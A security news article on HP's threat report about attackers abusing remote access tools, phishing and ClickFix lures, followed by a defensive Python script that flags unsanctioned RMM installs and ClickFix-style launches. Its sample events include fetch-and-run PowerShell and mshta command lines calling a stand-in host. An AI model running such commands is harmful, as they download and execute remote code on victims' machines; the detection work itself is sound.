- Legitimate software is now the most dangerous weapon in a hacker’s arsenal, HP warns
- Tax deadline phishing emails are opening doors that security scanners never flag
- Fake dating app downloads are delivering full remote access to attackers instantly
Cybercriminals are exploiting legitimate remote access applications such as LogMeIn and ScreenConnect to take control of victim devices without triggering standard security alerts, experts have warned.
HP’s latest Threat Insights Report, covering January through March 2026, documents how attackers are deliberately blending malicious activity into normal IT behavior to avoid detection.
The report draws on data from millions of endpoints running HP Wolf Security across the period under review, and finds that the campaigns follow a consistent pattern built on social engineering rather than technical exploits.
How trust becomes the weapon
Legitimate software becomes the perfect disguise precisely because security tools are least likely to flag applications they already recognize and trust.
When an attacker controls a familiar remote access tool on a victim’s device, nothing in the security stack raises an alarm.
That invisibility starts at the very first step: attackers used tax year-end phishing emails and fake desktop application downloads, including fraudulent dating website installers, to persuade users to install remote access tools that the attackers control.
Once installed, those tools gave attackers total device control while appearing indistinguishable from routine IT activity.
“What stands out in these campaigns is how easily legitimate remote access tools are being turned into entry points for attackers,” said Patrick Schläpfer, Principal Threat Researcher at HP Security Lab.
“By combining trusted software with carefully designed social engineering — tied to events like the end of the tax year — it’s getting even harder to distinguish what can and can’t be trusted.”
Separate campaigns uncovered in the same period used fake cryptocurrency wallet recovery tools distributed through code-sharing platforms and media download sites.
Those tools, rather than helping users recover lost wallets, harvested credentials, wallet data, and system information before packaging everything into archive files for exfiltration.
The emoji-heavy scripts used in these attacks showed characteristics consistent with AI-assisted coding.
This suggests that vibe coding tools are now lowering the barrier for building functional malware.
Malware hides in plain sight
HP’s report also documented ClickFix campaigns that disguised malware as audio files behind convincing fake websites and realistic CAPTCHA prompts.
Victims execute the malicious code themselves, in the background, while believing they are completing a routine verification check.
At least 11% of email threats identified by HP Wolf Security during the period bypassed one or more email gateway scanners entirely.
Executable files accounted for the largest share of malware delivery at 39%, followed by archive files at 38% and PDF documents at 10%.
“These attacks don’t look like break-ins — they look like business as usual, blending in with normal IT activity and avoiding the warning signs associated with malware,” said Alex Holland, Principal Threat Researcher at HP Security Lab.
Holland added that organizations should restrict unnecessary privileges, control software installation, and isolate risky activity such as downloads and unknown links.
Enterprise security teams are advised to adjust their defenses to account for attacks that look legitimate, rather than suspicious.
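The two patterns the report describes, remote access tools installed by the victim rather than the help desk, and ClickFix-style execution launched from a fake verification prompt, both show up in ordinary process-creation telemetry if you know what to compare against. The following Python sketch is an added example, not code from HP or the report: it runs two checks over constructed, Sysmon-style process events (field names, the allowlist of sanctioned install paths, the extra RMM product names, and the heuristic that a Run-dialog launch appears as a child of explorer.exe are all assumptions to adapt to your own environment).

```python
"""Allowlist-based triage of remote access (RMM) tools and ClickFix-style
launches over process-creation events.  Added example; the event layout
mimics Sysmon Event ID 1 fields (image, parent_image, command_line) and is an
assumption, as are the allowlisted paths and the RMM product names below."""
import re

# Sanctioned RMM binaries and the directory a help-desk-managed install uses.
# Assumption: replace with the paths your own deployment tooling writes to.
APPROVED_RMM = {
    "screenconnect.clientservice.exe": r"c:\program files (x86)\screenconnect client",
    "logmein.exe": r"c:\program files (x86)\logmein",
}
# Other RMM products that should never appear at all (assumed list; extend it).
KNOWN_RMM = set(APPROVED_RMM) | {"anydesk.exe", "teamviewer.exe", "rustdesk.exe"}

# Interpreters a ClickFix lure typically asks the victim to run via Win+R.
LOLBINS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Command-line indicators: encoded/hidden PowerShell, download-and-run idioms, raw URLs.
CLICKFIX_PATTERNS = re.compile(
    r"(-enc\w*\s|-w(?:indowstyle)?\s+hidden|\biex\b|invoke-expression|downloadstring|\bhttps?://)",
    re.IGNORECASE,
)
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\programdata\\")


def norm(path: str) -> str:
    return path.replace("/", "\\").lower()


def basename(path: str) -> str:
    return norm(path).rsplit("\\", 1)[-1]


def is_user_writable(path: str) -> bool:
    """True for locations a phishing victim can write to without admin rights."""
    return any(marker in norm(path) for marker in USER_WRITABLE)


def check_rmm(ev: dict):
    """Flag RMM tools that are not allowlisted, or that run outside their sanctioned path."""
    name = basename(ev["image"])
    if name not in KNOWN_RMM:
        return None
    approved_dir = APPROVED_RMM.get(name)
    if approved_dir is None:
        return f"RMM tool {name} is not on the allowlist"
    if not norm(ev["image"]).startswith(approved_dir):
        where = "user-writable path" if is_user_writable(ev["image"]) else "unexpected path"
        return f"allowlisted RMM tool {name} running from {where} {ev['image']}"
    return None


def check_clickfix(ev: dict):
    """Flag an interpreter spawned by explorer.exe (Run dialog) with download/obfuscation flags."""
    if basename(ev["parent_image"]) != "explorer.exe":
        return None
    if basename(ev["image"]) not in LOLBINS:
        return None
    hits = CLICKFIX_PATTERNS.findall(ev["command_line"])
    if not hits:
        return None
    return f"ClickFix-style launch of {basename(ev['image'])}: indicators {sorted(set(h.strip().lower() for h in hits))}"


def triage(events):
    """Return (event id, finding) pairs for every event that trips a check."""
    findings = []
    for ev in events:
        for check in (check_rmm, check_clickfix):
            finding = check(ev)
            if finding:
                findings.append((ev["id"], finding))
    return findings


# Constructed sample events; only 2, 3, 4 and 6 should be flagged.
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "parent_image": r"C:\Windows\System32\services.exe", "command_line": "ScreenConnect.ClientService.exe"},
    {"id": 2, "image": r"C:\Users\alice\AppData\Local\Temp\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "parent_image": r"C:\Windows\System32\msiexec.exe", "command_line": "ScreenConnect.ClientService.exe"},
    {"id": 3, "image": r"C:\Users\bob\Downloads\LogMeIn.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "LogMeIn.exe /silent"},
    {"id": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell -w hidden -c \"iex (iwr 'https://captcha.example/verify')\""},
    {"id": 5, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
    {"id": 6, "image": r"C:\Windows\System32\mshta.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "mshta https://captcha.example/verify.hta"},
]

if __name__ == "__main__":
    for event_id, finding in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {finding}")
```

The first check is the practical form of Holland's "control software installation" advice: a remote access client is only benign when it is the one your help desk deployed, from the path your deployment tooling uses, so path and allowlist are compared rather than just the product name. The second check catches the ClickFix step the report describes, where the victim, not an exploit, launches the interpreter; a sanctioned script run from the same parent (event 5) carries none of the indicators and is left alone.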
